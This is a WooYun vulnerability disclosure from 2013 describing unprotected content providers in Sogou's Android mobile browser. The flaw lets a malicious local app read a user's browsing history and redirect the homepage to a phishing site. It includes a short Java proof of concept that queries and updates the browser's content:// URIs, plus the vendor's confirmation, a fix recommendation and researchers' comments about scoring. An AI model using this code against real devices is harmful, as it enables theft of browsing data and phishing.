当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-042609

漏洞标题:搜狗手机浏览器隐私泄露和主页篡改漏洞二合一(需要手机里有恶意应用)

相关厂商:搜狐

漏洞作者: Pentest.mobi

提交时间:2013-11-11 18:57

修复时间:2013-12-26 18:58

公开时间:2013-12-26 18:58

漏洞类型:敏感信息泄露

危害等级:低

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-11: 细节已通知厂商并且等待厂商处理中
2013-11-11: 厂商已经确认,细节仅向厂商公开
2013-11-21: 细节向核心白帽子及相关领域专家公开
2013-12-01: 细节向普通白帽子公开
2013-12-11: 细节向实习白帽子公开
2013-12-26: 细节向公众公开

简要描述:

搜狗手机浏览器存在漏洞,恶意攻击者利用本地的恶意app盗取用户的浏览记录隐私,修改浏览器主页为任意的钓鱼网站。

详细说明:

漏洞原因:
几个重要的content provider都没做任何权限限制。
攻击代码:

Uri contentUri2 = Uri.parse("content://sogou.mobile.explorer/quicklaunch");
Cursor c = getContentResolver().query(contentUri1, null, null, null, null);
String xc ="";
if (c.moveToFirst()) {
for (int i = 0; i < c.getCount(); i++) {
c.moveToPosition(i);
String title = c.getString(1);
String url = c.getString(2);
xc=xc + title + ":" + url + "\r\n";
}
}
ContentValues test = new ContentValues();
test.put("url", "http://www.qq.com");
int xxx = getContentResolver().update(contentUri2,test,"_id=?",new String[]{"1"});


漏洞证明:

我没有打开草榴 - -!!!

1.jpg


点击SOHU,打开的是QQ.com,如果是钓鱼呢 - -!!

Screenshot_2013-11-11-18-40-53.png


Screenshot_2013-11-11-18-43-26.png


修复方案:

对content provider做权限限制。

版权声明:转载请注明来源 Pentest.mobi@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-11-11 19:08

厂商回复:

感谢支持。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-11-12 07:42 | Pentest.mobi ( 实习白帽子 | Rank:65 漏洞数:9 | 手机安全)

    囧,只给5分,两个漏洞应该分别给5分,最少10分。另外可以篡改数据的漏洞可不能评低,在app漏洞里至少要评个中,我要是篡改成file 协议的文件又可以衍生出其他信息泄露漏洞了。

  2. 2013-11-12 08:14 | 搜狐(乌云厂商)

    @Pentest.mobi 分的确打低了,sorry,没法改了,下次补上:)

  3. 2013-11-12 09:16 | 三克油 ( 路人 | Rank:2 漏洞数:1 | 初学者)

    哦 这个 很好 把主页改成这个 mm.boygg.com

  4. 2013-11-12 10:03 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @搜狐 利用难度大 差不多了

  5. 2013-11-12 11:08 | Pentest.mobi ( 实习白帽子 | Rank:65 漏洞数:9 | 手机安全)

    @xsser WooYun: 新浪微博Android应用本地信息泄露 同样的漏洞给了10分 我还是2个 一个信息泄露 一个篡改双重标准?